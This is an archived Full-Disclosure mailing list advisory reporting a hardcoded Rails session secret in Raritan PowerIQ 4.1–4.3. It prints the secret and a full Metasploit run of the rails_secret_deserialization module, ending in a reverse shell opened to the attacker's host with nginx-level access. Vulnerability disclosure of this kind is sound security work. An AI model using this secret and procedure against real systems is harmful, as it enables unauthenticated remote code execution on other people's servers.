lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAOJKFBDMLsGYDCCkLA3m4Cz+y+UBqmfGw4cGiNXB3C43PQHztQ@mail.gmail.com>
Date: Wed, 11 Mar 2015 19:57:17 -0500
From: Brandon Perry <bperry.volatile@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Raritan PowerIQ known session secret

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web
interface with a hardcoded session secret
of 8e238c9702412d475a4c44b7726a0537.

This can be used to achieve unauthenticated remote code execution as the
nginx user on vulnerable systems.

msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting

                                              Required  Description
   ----             ---------------

                                              --------  -----------
   COOKIE_NAME

                                               no        The name of the
session cookie
   DIGEST_NAME      SHA1

                                               yes       The digest type
used to HMAC the session cookie
   HTTP_METHOD      GET

                                              yes       The HTTP request
method (GET, POST, PUT typically work)
   Proxies

                                               no        A proxy chain of
format type:host:port[,type:host:port][...]
   RAILSVERSION     3

                                              yes       The target Rails
Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOST            192.168.0.20

                                               yes       The target address
   RPORT            443

                                              yes       The target port
   SALTENC
 BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==
 yes       The encrypted cookie salt
   SALTSIG          42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8

                                               yes       The signed
encrypted cookie salt
   SECRET           8e238c9702412d475a4c44b7726a0537

                                               yes       The secret_token
(Rails3) or secret_key_base (Rails4) of the application (needed to sign the
cookie)
   TARGETURI        /login/login

                                               yes       The path to a
vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true

                                               no        Only send the
payload if the session cookie is validated
   VHOST

                                               no        HTTP server
virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729)
at 2015-03-11 19:45:20 -0500

id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ